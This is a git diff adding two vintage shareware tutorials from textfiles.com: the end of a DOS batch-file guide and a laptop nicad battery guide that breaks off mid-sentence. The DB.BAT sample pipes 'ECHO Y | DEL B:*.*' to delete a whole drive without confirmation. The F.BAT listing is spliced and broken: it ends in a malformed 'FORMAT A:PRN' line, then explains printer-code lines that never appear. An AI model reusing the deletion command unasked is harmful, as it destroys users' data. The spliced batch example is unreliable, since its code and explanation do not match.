continue on within + the second batch file. For example, you could have one batch + file start another batch file. + + If a batch file contains a typing or syntax error in any of its + commands, the computer will stop execution at that point and + return you to DOS which remembers which disk contains the batch + file and the drive it was in. If you remove the original disk, + DOS will ask you to replace it so it can finish executing the + batch file. Batch files execute one step at a time from the disk + and NOT from RAM memory. This disk-based nature of batch files + make them a little slow, but they get the work done in + reasonably short order for most people. + + Several books and power user tricks should also be mentioned + regarding batch files before we move on . . . + + A superlative book on batch files you might wish to investigate + is MOS-DOS Batch File programming by Ronny Richardson, 1988, + Wincrest Books. + + You should also investigate the SEBFU (Scanlon Enterprises Batch + File Utilities) software package which is a series of small + batch file utilities which offer an improvement over the + standalone DOS batch file programming language. SEBFU allows the + user to produce subtle, powerful batch files and includes an + excellent tutorial about using batch files for productivity. If + you wish to try SEBFU, the shareware version, contact Scanlon + Enterprises, 38354 17th ST E #C, Palmdale, CA 93550 Telephone + (805) 272-4827. Include five dollars for shipping and handling. + + Special batch file COMPILER utilities exist which speed + execution of batch files and make them run from RAM memory + rather than disk. Most computer clubs and BBS system carry these + batch file compilers. One popular batch compiler is named + BAT2EXEC and was produced by PC Magazine several years ago. + Batch files will FLY once they have been compiled and run + from memory rather than disk. Another batch file speedup trick + uses a "ramdisk" as follows. + + Remember the DOS VDISK command in our second DOS tutorial? Many + DOS experts put commonly used batch files in a virtual or RAM + disk in memory where a batch file runs quickly. This is one + trick which can turbocharge batch file operations. + + ---------------------------------------------------------------- + + AUTOEXEC.BAT FILE BASICS - THE WAKEUP CALL TO YOUR COMPUTER + + ---------------------------------------------------------------- + + The AUTOEXEC.BAT file starts your computer exactly the way you + want. It allows you to customize the machine to your liking as + the computer comes to life. You can cause the AUTOEXEC.BAT file + to print a startup menu of choices, load one particular program, + execute another batch file or other useful tasks. The + AUTOEXEC.BAT file is the first file DOS runs after loading + itself and configuring the computer. The AUTOEXEC.BAT file must + be on the same disk as DOS when the computer starts. + + The AUTOEXEC.BAT file is a special batch file which MUST be + placed in the main or root directory of a disk to function + properly. + + An AUTOEXEC.BAT file can always be modified, enlarged, edited, + or deleted later as you wish. Sometimes it is useful to have + several AUTOEXEC.BAT files. Each on a different startup disk to + operate different programs! An AUTOEXEC.BAT file, like all batch + files, can be modified with any word processor, DOS EDIT or + EDLIN text editor. + + Before tinkering with your AUTOEXEC.BAT file, make sure you do + not accidentally over-write or destroy your current AUTOEXEC.BAT + file. If necessary, rename your current AUTOEXEC.BAT file (using + the rename or REN command) and make a new file while saving the + old one "just in case." Never edit files on your original DOS disk, + work on a copy! This wise advice applies to ANY computer file. + Save a backup copy; never work on the original. + + Examine the next batch file: + + copy con AUTOEXEC.BAT (press enter) + 123 (press enter) + ^Z (press enter) + + This means (first line) create a file named AUTOEXEC.BAT as + typed from the keyboard or con (console). Then (second line) + start program named 123. The (final line) end of batch file + preparation - stash it on the disk. Since the first and last + lines prepare the batch file, this program really has only one + line whose purpose is to start a specific program (123.EXE) each + time the computer is turned on. + + When finished you'll see a file named AUTOEXEC.BAT on your + directory listing screen which contains automatic startup + instructions. If this file were placed on your main DOS disk it + would try to start a program such as 123.EXE if such a program + existed there. And since it is AUTOEXEC.BAT this would be the + first file run each morning when you turn on your computer. + + You can also start the AUTOEXEC.BAT by typing autoexec and then + pressing enter. To take a "peek" at the contents of an + AUTOEXEC.BAT file (or any bat file) simply use the type command. + Remember to use Ctrl-S key combination to pause the screen if + the display flashes by too quickly. + + Example: C>type AUTOEXEC.BAT (display file contents) + Example: A>type b:AUTOEXEC.BAT (display file on the B: drive) + Example: C>type AUTOEXEC.BAT>PRN (display file contents on + printer) + + Here is another AUTOEXEC.BAT file, this time from a hard drive + computer. It provides a higher degree of control and direction + that a computer user might need for hard drive customization. + + path \dos;\reflex;\wp;\util;\doc;\nor;\bat + prompt $P$G + cpu n + verify on + blank + mode bw80,r + dispclk + type menu.txt + + Let's examine this more complicated AUTOEXEC.BAT file in greater + detail: + + The first line after establishes a path command to help DOS + search every subdirectory on the hard disk -you don't have to + switch around to different areas of the disk, DOS will search + for you since it knows the various subdirectory "paths" to take. + + The second line alters the cursor prompt to always display your + current location and subdirectory. Instead of seeing C> you view + a more informative C:\DOCS> for example. + + The third line is a reference to the speed the computer will + operate at and is a unique command to a particular brand of + machine (cpu n means start the central processing unit chip at + normal speed.) Cpu is really CPU.COM, an external file which + sets the computer's processing speed. Your DOS disk may or may + not contain the file CPU.COM. This highlights the ability of the + AUTOEXEC.BAT file to start or load other programs and is + very useful! + + The fourth line turns on the verify function for file copying. + + The next line instructs the DOS mode function to switch to black + and white display, 80 columns wide and shift one column to the + right for alignment. We are setting the hardware the way we + wish. We could also configure the modem or printer with the mode + command. + + Next we ask DOS to tell us the time and date. Run the program + DISPCLK.COM, an external program stored on disk. + + The final line instructs DOS to type to the screen a text file + containing a simple menu for the monitor to display. Menu.txt + probably gives us choices of programs and thus calls other batch + files. + + ---------------------------------------------------------------- + + BATCH FILE COMMANDS AND USE + + ---------------------------------------------------------------- + + In addition to the normal DOS commands, batch files have eight + special subcommands. At the end of this section we will provide + some interesting batch files which you can use or edit on your + computer. + + The special batch commands are: + + --- REM --- The rem command sends a message to the screen or + simply documents or notes a part of a batch file's operation. + You should use REM extensively to document long detailed batch + files so you can revise things and locate portions of the + program if you decide to change the batch file later. Remarks + can be up to 123 characters long. REM does not cause any + operation, it merely documents what you want to say or do. + + Example: C>REM this is the location of menu operations + + In DOS 2.0 the REM command could be replaced with a period or + dot, but this is not true in DOS 3.0 and above. + + Example: C>. this is the location of menu operations + + --- PAUSE --- Stops batch file execution on a temporary basis + until you press a key. Thus you can pause a batch file and do + some operation (perhaps changing a floppy disk) and then + continue when you strike a key. Very useful. + + Example: B>PAUSE + Example: B>PAUSE This is an optional message, pardner! + + In the first example, no message is displayed. + + --- ECHO --- Turns display listing of commands on/off. It can + also send a message to the screen. It is frequently turned off + to remove excessive screen messages. Normally, with ECHO on, + screen messages are sent to the screen which can be distracting. + To suppress them use the first example. To restart the messages + use the second example. To add a message with the ECHO command + see example three. REM or remark command can also send a message + to the screen but NOT with ECHO turned off! + + Example: A>ECHO OFF + Example: A>ECHO ON + Example: A>ECHO It's raining cats, dogs and computers + Example: A>@ECHO (don't display this particular line) + + --- PARAMETERS AND MARKERS ---- This is NOT a batch file + command like ECHO or PAUSE. + + Instead parameters are additional pieces of information or + "modifiers" which follow DOS commands. + + Example: C>format b:/s + + In the above, format is the command while b: and /s are the + parameters. Parameters modify the basic operation of a DOS + command but are not required by the command to operate. A batch + file can also accept parameters such as a word, filename, + symbol, drive letter or any useful character or group of + characters! + + Markers placed inside the batch file listing signify which + parameter goes where. Markers are made from a percent sign (%) + and a single digit between 0 and 9 for a total of ten markers + available (remember, zero is a number too.) Here are the ten + markers: + + %0 %1 %2 %3 %4 %5 %6 %7 %8 %9 + + Let's use an example. Pretend that DOLITTLE.BAT is on your + floppy. Within its listing of commands there might be this + single line: + + ECHO %0 %1 %2 (ECHO shows messages on the monitor) + + If at the DOS prompt you typed: + + B>DOLITTLE fancy pants (then press enter) + + Your screen would show the following: + + ECHO DOLITTLE fancy pants. + + In this case, %0 has taken on the value at the start of the DOS + command which is the first word "DOLITTLE". Meanwhile %1 has + become "fancy" and %2 is now pants. + + Looking at this another way: + + DOLITTLE fancy pants + | | | + ECHO %0 %1 %2 + + Let's try a more useful example. Pretend you had a large file of + word processing files containing bills you have to pay from time to + time. + + You need to look up bills or amounts in the file accounts.txt + which is in plain ASCII (english) text from your word processor. + + The DOS FIND utility can search large files for specific words, + strings or characters. The general format for the FIND command + is: FIND "text" filename. FIND is located in the file FIND.COM + on your DOS disk and must be present with the batch file to be + used. + + A simple batch file possibly named GET.BAT could do this: + + ECHO OFF + ECHO searching for data . . . . + FIND "%1" %2 + ECHO Finished, boss + + Start the batch file get.bat with search data like this: + + C>get grocery accounts.txt (first word starts get.bat, second + word is the item to search for, third item is the file to + search.) + + As a result, you will get a report of the line where the word + "grocery" is found within the file accounts.txt. This could also + be used to search a telephone list or list of employee names and + addresses. A powerful idea for a short batch file! + + --- GOTO --- Jumps to a labeled set of commands within the + batch file. The general format for the command is GOTO LABEL + where LABEL is a line in the batch file which must start with a + colon (:) followed by a name up to eight characters long. + + A simple, but useless batch file illustrates the GOTO command by + looping around in circles doing the same task endlessly. + + Example listing for batch file: + + ECHO OFF + :kitty + ECHO watch this fill your screen over and over, folks + GOTO kitty + + Note! On some versions of DOS it is necessary to include one blank + line at the end of this file. In the above example, just press + Enter/Return key one extra time after the line "GOTO kitty" + and then save the batch file. + + The above batch file will continue to print the remark line over + and over since it always returns to the start. Tap Ctrl-Break to + stop this silliness. The true usefulness of the GOTO command is + best understood by allowing the GOTO within a batch file to + transfer control elsewhere within its listing rather than to the + line immediately next in sequence. You can thus cause varying + useful results depending on a conditions present. Choices and + different outcomes are a trademark of savvy batch file use. + + --- IF --- Allows conditional operation of a command. This is a + fancy way of saying you can cause a batch file to make decisions + based on a logical condition or input then do something. The + usual syntax of the IF command is IF CONDITION COMMAND. Let's + take this apart and examine the concept. + + In the situation IF CONDITION COMMAND: + + COMMAND is any normal DOS or batch file command and CONDITION is + one of three possible tests that yield true or false. + + Example: IF %1==w GOTO dog (we'll explain this in a bit) + Example: IF %3 == 80 MODE BW80 (we'll explain this in a bit) + + The three possible tests are: + + 1. The ERRORLEVEL condition (i.e., a specific number is found). + 2. The STRING COMPARISON. (i.e., two strings are equivalent or + not.) + 3. The FILE EXISTENCE condition. (i.e., if a file exists or not.) + + In true full-featured programming languages many other logical + tests might be allowed, but for batch files these are the + only three tests. Let's examine the three more closely. Then + illustrate with an example. + + 1. ERRORLEVEL is a number which tells DOS whether the last + program run was successful. If so the errorlevel is zero (0) + anything else above zero means unsuccessful. + + 2. STRING COMPARISON, the second conditional test, is always + indicated in a batch file by double equals signs (==). A test is + designated by the condition IF string1 == string2. This is + frequently used with parameters or markers such as: IF %3 == 80 + MODE BW80. + + 3. In the final and third conditional test, FILE EXISTENCE, the + usual format is IF EXIST d:filename.ext. which checks for a + certain file on a certain drive. You can thus check for a + certain disk or file before continuing the batch file process. + Pathnames are not allowed (d:\slip\and\slide). + + Let's try a batch file example to illustrate the use of STRING + COMPARISONS to make a choice in how the batch file does its + work. In a way, this is a menu program. Pretend you have two + software applications. One is a word processor named WORD.EXE + whose command to start is WORD and the other is a spreadsheet + named LOTUS.EXE whose command is LOTUS to start. + + If we prepared a simple batch file called go.bat whose listing is + below, we could start one or the other program by using either + the command: + + A>go w (to start the word processor) + + OR THIS: + + A>go s (to start the spreadsheet). + + Notice how the "w" or "s" is picked up by the batch file and + sends the program either one direction or the other in the + example below. The remarks lines which begin with REM in the + batch file give you a clue about the operation of the program + but are not themselves commands. The end result of this batch + file is a saving of keystrokes for frequently used software (the + word processor and spreadsheet) and could be expanded to start + many other software packages. + + REM This batch file selects one of two choices based on input + REM The next line turns off screen echo to avoid screen clutter + ECHO OFF + REM Begin test for one of two choices + REM Next two lines use percent signs as markers for "w" or "s" keys + IF %1==w GOTO dog + IF %1==s GOTO cat + REM Next line forces goto end if no match is made for w or s + GOTO end + :dog + REM Next command starts word processor, WORD.EXE + WORD + GOTO end + :cat + REM Next command starts spreadsheet, LOTUS.EXE + LOTUS + GOTO end + :end + REM Next line switches to root directory and ends the batch file + CD\ + ECHO Batch file done, bye bye! + + --- SHIFT --- Re-assigns the relationship of parameters to + markers. It changes their values. And it does it in a very odd + way . . . + + Remember that there are only ten markers available to a batch + file to hold the parameter values as we mentioned above. Here + they are: + + %0 %1 %2 %3 %4 %5 %6 %7 %8 %9 + + However you can raise the limit of 10 parameters in a batch file + using the single word SHIFT. When this command is encountered in + a batch file, all the parameter and marker pairings are shifted + one unit to the left. Whatever was assigned to %0 is lost. + + A diagram to visualize. Before a SHIFT command is issued the + parameters and markers might be: + + %0 %1 %2 + | | | + dog cat computer + + After the SHIFT command we would see: + + %0 %1 %2 + | | | + cat computer + + Notice that dog is lost, %1 becomes computer and %2 is left + vacant unless it takes a new parameter from %3 (if %3 had a + parameter). The effects of the SHIFT command are wide ranging + throughout the batch file and provide great flexibility and a + range of parameters greater than ten values. + + --- FOR..IN..DO --- Allows iteration (repetition) of actions + or commands. The command is similar to a FOR...NEXT...STEP loop + programmers use. This command lets you repeat an action several + times. + + The command is rather subtle and could be thought of as a three + part command. The syntax is: + + FOR %%Variable IN (Set) DO Command + + Let's look more closely at the three parts: + + FOR %%Variable IN (Set) DO Command + ============== ======= ========== + | | | + part 1 part 2 part 3 + + Translating into English this means: FOR a certain batch file + variable withIN a SET of filenames or commands DO a certain + action. + + The %%VARIABLE is a one-letter variable which must have a double + %% prior to the letter to distinguish it from single % markers + we have seen earlier. + + The SET portion of the command is always in parenthesis as + (SET). The SET represents filenames or DOS commands you want the + %% variable to assume while the command is executing. A space is + used between entries. Pathnames are never allowed but wildcards + such as *.* are acceptable. If the SET contains DOS command then + only the %%VARIABLE is used. + + The COMMAND is a DOS command or batch subcommand. One or several + of these commands will contain the %%Variable in it. + + Let's try an example. Pretend by you want a batch file to + present the DOS version then clear the screen and finally issue + the directory. We could do this in three lines by: + + VER + CLS + DIR/P + + However, with the command FOR..IN..DO we can do this in one + line: + + FOR %%T IN (Ver cls Dir/P) DO %%T + + Notice how each DOS command is separated by a space. ? and * are + NOT allowed within any command within the SET. Use a colon : + instead of a space within the set when passing parameters to + programs. You can issue the FOR..IN..DO batch file subcommand at + the DOS prompt by dropping one of the percentage signs % on + the variable. Let's move on to some practical and fairly + interesting examples . . . + + ---------------------------------------------------------------- + + BATCH FILE PROJECTS FOR YOU TO TRY! + + ---------------------------------------------------------------- + + The following batch files do real work and can teach you some + fascinating principles. + + To save typing each example, here's a shortcut: simply load this + file, BATCH.TUT, from this disk or hard drive into your word + processor. Next, delete the tutorial and batch files you don't + need, keeping only the batch file lines you require. Move all + lines of the batch file to the far left margin then save the + batch file back to disk in plain ASCII text with a permanent + batch file name such as CANDY.BAT, GO.BAT or PRINTER.BAT which + you can easily remember. Feel free to change or add things to + these batch files with your word processor since that's the + point - batch files are flexible! + + Note the liberal use of the remarks or REM lines in some batch + files to explain how things work. If you like, delete all REM + lines to save typing time, space and speed program execution! + + ---- Fast freespace batch file ---- + + This is a short but useful batch file. It reports the amount of + freespace on a disk by using the FIND command in DOS to search + out the line containing the word "free" in the DOS DIR command. + + Program name: TELLFREE.BAT + + ECHO OFF + CLS + ECHO CHECKING FOR FREE SPACE ON DISK + DIR | FIND "free" + + You could modify the last line to DIR A: | FIND "free" to locate + the free space on the A: drive. The piping symbol | , discussed + in a previous DOS tutorial illustrates how one command (DIR) can + "pipe" its output into the FIND command. You MUST have the DOS + file FIND.EXE on the same disk so that the DIR command can use + it. The word "free" is case sensitive and must MOT be typed in + capital letters since the FIND command is case sensitive. + + Obviously, to use this small program, at the DOS prompt just + type TELLFREE then press the return or enter key. You could also + name this batch file T.BAT if you wanted to only type a + single letter and save additional keystrokes. + + ---- Fast deletion batch file ---- + + This is a short batch file with some powerful wrinkles for + speedy file deletions. It could be modified in many ways. + + Program name: DB.BAT + + ECHO OFF + CLS + ECHO Ready to delete ALL files on B: drive + ECHO Press control-break keys to abort or + ECHO any other key to continue + PAUSE + REM Following line does the deleting + ECHO Y | DEL B:*.* + ECHO DONE! + + This is an odd batch file using some powerful DOS secrets. Line + four reminds us we are about to delete all files on the B: drive + and gives us the chance to abort using the control-break key + combination which works to abort all batch files. The pause + command on line six halts operations and waits for our keypress. + + Line eight shows the real power of DOS in a one line command + which uses ECHO to pass the keystroke Y (meaning yes) via the + pipe operation of DOS represented by the vertical bar |. This + effectively means that the deletion of all files on B: drive + represented by *.* will take place WITHOUT pausing for the + traditional Yes/No request. The name of the batch file, DB.BAT + reminds us that its use is to delete all files on B: drive or + DB, for short! + + ---- Fast formatting batch file ---- + + This batch file will speed your disk formatting. Its name + F.BAT means format disks, and it gives you some choices and + illustrates other batch file tricks. + + There are three ways to use it: for formatting A: drive, B: + drive, or both A: and B: drives. Note the minimum number of + keystrokes required and how the batch file determines your + choice by using parameters. This batch file also requires a + small text file called yes.txt which shows how a file can be + used to redirect input to a DOS command in place of the + keyboard. It is explained below. Be sure to prepare YES.TXT or + F.BAT will not work! + + To start this batch file you MUST chose one of the following. + The space between letter characters is important. + + To format only A: drive, at DOS prompt enter F A + To format only B: drive, at DOS prompt enter F B + To format both A and B drives, at DOS prompt enter F AB + + In the above commands, the A, B or AB will be inserted into the + batch file in the location of the symbol %1 as noted earlier in + this tutorial. + + Program name: F.BAT + + ECHO OFF + CLS + ECHO FORMATTING DISKS NOW! + REM This batch file selects one of three choices based on input + REM Begin test for one of three choices + IF %1==A GOTO DOG + IF %1==B GOTO CAT + IF %1==AB GOTO MOUSE + REM Next line forces goto end if no match is made + GOTO end + :DOG + FORMAT A:PRN + ECHO DONE + + The fourth line contains a secret trick. The code we need to + send is 27 69 according to our printer book. When preparing this + batch file with EDLIN, COPY CONsole or your word processor, you + must send the printer control code 27 then 69 to the printer. + + In line four after typing the word "ECHO" then a blank space, + hold down the ALT key then press 155 on the FAR RIGHT NUMERIC + KEYBOARD. When done entering the number, release the ALT key. + On most computers, the cents symbol will appear which the + printer will accept as the "escape code 27." DO NOT type the + left and right parenthesis marks which appear on line four: ( ), + they are only for clarity. + + Next press ALT 69 which produces the E symbol. You could also + just type capital E. Next type >PRN which sends this code + to your printer. Note that there is NO blank space between (ALT + 155) and (ALT 69). + + The code 155 is substituted for 27 but the 69 is unchanged. Why + 155 rather than 27 for the escape code? An explanation: Printer + control codes begin with code 128, thus escape character 27 is + generated by using 27+128 = 155. An necessary trick for this + batch file. We could send SEVERAL codes by adding more lines to + the batch file to set letter quality, pica font, line spacing + and tabs, then type the letter to the printer (ECHO LETTER.TXT>PRN) + and finally reset the printer. Your printer book discusses these + decimal control codes. + + If we wanted to send a formfeed to the printer (eject paper,) + the printer reference book suggests control code 12, therefore + 12+128 = 140. So the fourth line in the batch file would read + ECHO (ALT 140) >PRN. The bell sound (decimnal code 7) is + generated by 7+128 = 135. The batch file would change to read + ECHO (ALT 135) >PRN. + + Some printer features are controlled by SINGLE control codes + while other features are controlled by MULTIPLE escape sequence + codes which always begin with 27 followed by additional numbers. + Escape code 27 is always translated to ALT 155 when DOS and + batch files transmit the printer control information. Within + software programs the codes may use a different format: \027E + for example. + + Many other printing features can be turned on using short batch + files. For example, double strike printing uses the decimal code + 27 71. In the batch file you could use ECHO (ALT 155)(ALT 71) >PRN. + + You can also turn on a COMBINATION of several features in one + longer batch file to control several features. Just add more + lines and codes to the batch file! + + To reset the printer when a printing job is finished: code 27 + 64. Search out these printer codes in your printer manual and + let a batch file do the hard work! + + One of the best batch file tutorials to date was published in + two parts in the November and December 1991 editions of PC + Computing Magazine. Contact your library for back issues or + contact PC Computing at Back Issues Dept, PC Computing Magazine, + Ziff Davis, POB 53131, Boulder, CO 80322. Back issues currently + cost $6.00 each. + + The bibliography/suggested reading list with this disk provides + additional reading suggestions to advance your batch file + knowledge. + + Tutorial finished. Be sure to order your FOUR BONUS DISKS which + expand this software package with vital tools, updates and + additional tutorial material for laptop users! Send $20.00 to + Seattle Scientific Photography, Department LAP, PO Box 1506, + Mercer Island, WA 98040. Bonus disks shipped promptly! Some + portions of this software package use sections from the larger + PC-Learn tutorial system which you will also receive with your + order. Modifications, custom program versions, site and LAN + licenses of this package for business or corporate use are + possible, contact the author. This software is shareware - an + honor system which means TRY BEFORE YOU BUY. Press escape key to + return to menu. + + diff --git a/textfiles.com/computers/battery.txt b/textfiles.com/computers/battery.txt new file mode 100644 index 00000000..af2b0cf6 --- /dev/null +++ b/textfiles.com/computers/battery.txt @@ -0,0 +1,441 @@ + + ---------------------------------------------------------------- + + RECHARGEABLE BATTERIES AND LAPTOP COMPUTERS + + ---------------------------------------------------------------- + + No other topic seems to inspire more opinion and comment than + the proper care and handling of rechargeable laptop and notebook + computer batteries. Should you slow or fast charge them? What is + the true life of a rechargeable battery after which it must be + disposed? Do rechargeable batteries have a "memory" effect? Can + nickel-cadmium batteries explode when charging or discharging? + + Although this tutorial may seem technical in places, try to read + ALL of it since battery power may be your only source of laptop + power on many occasions. + + For many portable computers a variety of rechargeable battery + options exist today. But frequently it comes down to the old + standby: nickel-cadmium batteries. Ubiquitous in consumer + electronic items such as shavers, flashlights, toothbrushes and + radios, nickel-cadmiums or "nicads" are a reasonable balance of + power, cost and weight and are used by many computer + manufacturers as the portable power source of choice. Let's + scratch the surface on the topic since there is QUITE A BIT the + manufacturer doesn't tell you about nicads.... + + Glance at the following chemical equation which is at the heart + of the nickel-cadmium cell reaction. Don't get overly anxious + because high school chemistry was not your favorite subject. + We'll take things slowly.... + + <----- + Cd + 2 NiOOH + 2 KOH -----> Cd(OH) + 2NiO + 2 KOH + 2 + + In this highly simplified reaction sequence, electricity is + generated when the reaction proceeds in the direction of the + right pointing arrow, the discharge cycle. If the reaction + proceeds in the left direction the cell is charging. + + In simplest terms, a nicad cell (a battery is constructed of + several cells hooked together) has a positively charged plate of + nickelic hydroxide and a negative plate of metallic cadmium. The + liquid between the positive and negatives plates which + facilitates this chemical reaction is usually a dilute solution + of potassium hydroxide - similar to lye or the Draino (tm) + solution your pour down the sink to clean your plumbing. When + discharging and thus producing electricity, the nickelic + hydroxide is reduced to nickelous hydroxide as hydroxyl ions + from the potassium hydroxide electrolyte combine with the + cadmium metal of the negative plate of the cell to form cadmium + hydroxide. Cadmium is oxidized when this happens and electrons + are provided into the external circuit, such as your laptop + computer. + + When charging, the process reverses and hydroxyl ions combine + with the nickel which accepts electrons from the external + charging circuit. Notice that the electrolyte, potassium + hydroxide is unchanged with two atoms or units produced on both + sides of the chemical equation whether charging or discharging. + This is why you do not need to add more water to a nicad battery + which operates as a sealed reaction container. It regenerates + its electrolyte in both the charge and discharge cycles. + + All of this is an ideal nicad cell. The real world of computers + and rechargeable batteries is not quite that simple. The first + SERIOUS item to consider is that all nicad cells and batteries + generate gas during both the charging, and to a lesser extent, + discharging cycle. + + During recharging, oxygen gas is generated at the positive + electrode while hydrogen gas is produced at the negative + electrode. In other types of rechargeable cells, a standard lead + acid car battery for example, these gasses are usually released + into the atmosphere. The nicad cell does not have this luxury + since it must operate cleanly and with minimum release of gasses + or liquids. To minimize hydrogen gas release, nicad cells + usually have an oversized negative electrode which tends to + reabsorb hydrogen gas. In addition oxygen is recycled by + combining with metallic cadmium to produce cadmium oxide. So + called "fast-charging" nicad cells prevent gas buildup and + dissipate some of the heat generated during the quick charge + cycle by further enlarging the electrodes. Heat and gas buildup + is thus controlled and kept to tolerable limits in quick charge + nicads. + + The first of several lessons which can be derived from this + technical discussion is that the buildup of hydrogen and oxygen + gas during the charging cycle is normally dissipated unless HIGH + recharging rates are attempted or unusually high temperatures + are produced. If the nicad cell is charged at abnormally high + rates the oxygen gas cannot dissipate and will EXPLOSIVELY + rupture the cell. + + A safety system of sorts exists within the design structure of + most nicad cells via a pressure venting system - a plastic + diaphragm membrane at the top of the cell and small external + hole or "exhaust vent." In theory the system safely vents excess + pressure and then reseals. In practice the resealing is never + complete and the cell may continue to ooze caustic electrolyte + or worse the vent may not open soon enough and the cell may + simply explode. The vent is really designed for SEVERE charging + or discharging rates. In normal use it should NEVER activate; if + it does, the battery should be discarded. In cases of massive + overcharge or discharge the safety vent is usually too little + too late and a dangerous battery explosion takes place anyway. + + During rapid discharge - short circuiting the nicad cell or + battery with a piece of wire, for example - gas buildup and heat + can be generated and a violent explosion can occur. Another + reason why nicads can explosively burst when short circuited and + forced to discharge quickly is that they have relatively low + "internal resistance" which allows them to dump their electrical + capacity quickly and with explosive force. + + Common zinc carbon batteries have a much higher internal + resistance and when shorted may produce serious burns to your + fingers from melting wire but usually will not explode due to + sudden gas buildup. On the point of sudden nicad discharge by + short circuit you might be tempted to say that it would be highly + unlikely with a portable computer battery. Not so. Tales are + told of laptop computer batteries which have exploded when a + careless owner shoved several fully charged nicad batteries in a + travel case with a set of spare keys. If the keys accidentally + contact both the positive and negative poles of the nicad + simultaneously, a violent explosion reaction can occur! + + Clearly nicads have some unusual features to be respected and + understood. Be careful with charged nicads and treat them as the + small "hand grenades" which they can become. Heat, sudden short + circuits and high rates of charging are the problem in this + area. + + The correct operating temperature for discharging and recharging + nicads is from 65F to 85F, according to most manufacturers. High + and low ranges of from +32F to 115F are possible as upper and + lower limits if nicads MUST be used in extreme environments + although discharge and recharge efficiency may be adversely + affected - it may require more power to fully charge the battery, + charge may not be held for as long on the shelf after charging + and finally discharge may not produce a full three or four hour + computing session at these severe temperature ranges. + + Electrically, individual nicad cells - the units which are + hooked together to produce the final battery - have a charged + voltage of 1.25 volts. Nominally this drops to 1.2 volts under + actual discharge use or "load" in the electrical device. + Individual cells are strung together in "series" with the + positive terminal of one cell touching the negative terminal of + the next cell in sequence to raise the voltage to that suitable + for the electrical device. Thus two cells hooked in "series" as + a battery produce 2 X 1.2 volts = 2.4 volts. Likewise, three + cells connected as a battery produce 3.6 volts. By the way, + ordinary flashlight batteries of the carbon zinc type have a + nominal voltage of 1.5 volts compared to the 1.2 volts of the + nicad cell. + + Nicad batteries have an unusual and highly characteristic + discharge behavior which is best described as "a stable + discharge plateau then sudden voltage drop." Essentially a fully + charged nicad battery provides constant voltage and current + until near its exhaustion at which point the voltage SUDDENLY + DROPS and the cell is, for practical purposes, completely + discharged. + + Compare this to standard carbon zinc and alkaline batteries + which gradually drop in voltage and amperage through the + discharge cycle of the battery. In use nicads tend to be stable, + then die suddenly at the end while conventional non-rechargeable + batteries slowly decay in voltage as their power is consumed. + One conclusion you might draw from this is that when your + portable computer beeps that the nicad battery voltage is + nearing exhaustion you literally have only moments of use left! + The good news is that nicads produce dependable power through + their discharge cycle which is highly desirable with digital + data and computer memory devices. + + The "memory effect" of nicads is perhaps the most discussed and + misunderstood phenomenon associated with nicad cells and + batteries. An undesirable and somewhat unique characteristic of + nicad batteries that they can develop a "memory" which can + decrease either the capacity or voltage of the battery. + + The first type of memory problem in nicads - voltage memory - is + caused by sustained charging over many days or months. This + memory effect can be accelerated by high ambient temperature + extreme duration of charge and high rate of charge. In effect + the battery is charged for such a long period of time or at such + a high rate or high temperature that the efficiency of the + chemical reaction is impaired and proper terminal voltage + readings are not achieved. + + In the second, more common "memory capacity" problem, the nicad + loses the capability to deliver its full power capacity. One + cause of this peculiar memory problem is the FREQUENT PARTIAL + DISCHARGE of the battery - use for perhaps 30 minutes - and then + full recharge again. In effect the nicad battery "learns" that + only part of its capacity is used and over several cycles of + "partial depletion and then full recharge" that less then full + capacity is needed. It will then be unable to deliver a full + two or three hour standard discharge in normal use. Fortunately + memory effects are usually temporary and can be reversed. + + The chemical basis for these two memory effects is not fully + understood, but may have to do with obscure oxidation reactions + which temporarily coat the internal electrodes of the battery + with thin layers of complex non-reactive chemical compounds + which can be removed by more fully "exercising" a nicad through a + complete charge/discharge cycle. + + It is claimed by many manufacturers that this odd memory effect + of nicads has been largely eliminated due to modern + manufacturing methods. However to some degree this may in fact + be a result of newer charging systems and the relatively + complete discharge of nicad power by modern laptops. In effect + the batteries are charged and discharged in a more appropriate + manner by most laptop users so memory effects "appear" to be no + longer a problem. + + Both memory problems - voltage memory and capacity memory - are + usually temporary and can be corrected by discharging the + battery to or very near its exhaustion point (optimum drawdown + voltage is about 1.0 to .9 volts for a standard 1.2 volt nicad) + and then recharging it to full capacity. Repeat this discharge- + recharge cycle from 2 to five times and frequently the nicad + will lose its memory for the "partial capacity" and again + provide a full 3 or 4 hours of use in most laptops. Actually, + frequent FULL discharge and recharge prolongs the life of a + nicad. The more you use them the longer they last! + + Most folks who want to completely discharge laptop nicads simply + leave the computer on until it runs down. A much faster method is + to use the following batch file which continuously reads the + directory of a disk and writes the contents to a disk file. + The continuous disk access drains nicad power much faster. If + you are not familiar with batch files, read the batch file + tutorial elsewhere in this program. Here's the three line batch + file. To stop the batch file at any time press the control and + break keys simultaneously. When finished you may wish to erase + both the batch file and the small file named "test" which it + creates. + + :start + dir>test + goto start + + As an aside, the newer nickel-hydride batteries used in some + laptop and notebook computers do not seem to suffer from memory + effects. But these batteries are more expensive and not in + common use by most laptop manufacturers. + + Nicads do eventually fail. And for various reasons. Temporary or + partial failure due to memory effects was discussed in the + previous paragraphs. + + Permanent failure - usually between 3 to 5 years into the life + of a typical nicad can happen due to the growth of + characteristic "whiskers" of conducting chemical compounds which + effectively bridge the internal gap between the positive and + negative electrodes inside the battery. Effectively these small + contamination deposits gradually short circuit the battery + internally which leads to inability to charge or discharge. Some + clever electronic hobbyists build high current "surge" power + supplies which can burn open these internal deposits and reopen + the gap between positive and negative electrodes. A risky + practice at best - given the explosive reputation of nicads - but + "zapping" nicads in this manner has been documented as one way + to add life to an otherwise dying battery. A risky an usually + ill-advised attempt to salvage an otherwise dying battery. + + A different permanent failure can result from premature loss of the + liquid electrolyte from the battery. High temperature and/or + high charging rates are usually the cause here. Quick-charge + batteries frequently fail due to this problem if their charging + circuits are not properly designed. If the top edge of the cell + which contains the fail safe pressure release valve has a + buildup of white corrosion powder this is probably the residue + ot the expelled electrolyte and the cell may be on its way to + failure and should be replaced. Note that you can only see this + corrosion buildup on the top of the SINGLE nicad cells which are + usually encased within a surrounding plastic battery housing. + The plastic housing may show little problem externally. + Generally, however, the average computer user should not attempt + to open the protective plastic case of the battery to examine + each cell. If the manufacturer seals several individual nicad + cells in a plastic battery container it is for GOOD reason and + your own personal safety. As a rule quick charge nicads do not + last as long a regular nicads due to heat build up during the + charging cycle. + + So how long will a nicad battery last before complete failure + occurs? Manufacturers estimate LOW figures between 500 and 1,000 + full charge and discharge cycles or about 3 to 5 five years, as + noted above. Some nicads have been known to approach 5,000 to + 10,000 charge and discharge cycles before permanent failure. + Excessive quick charging, heat 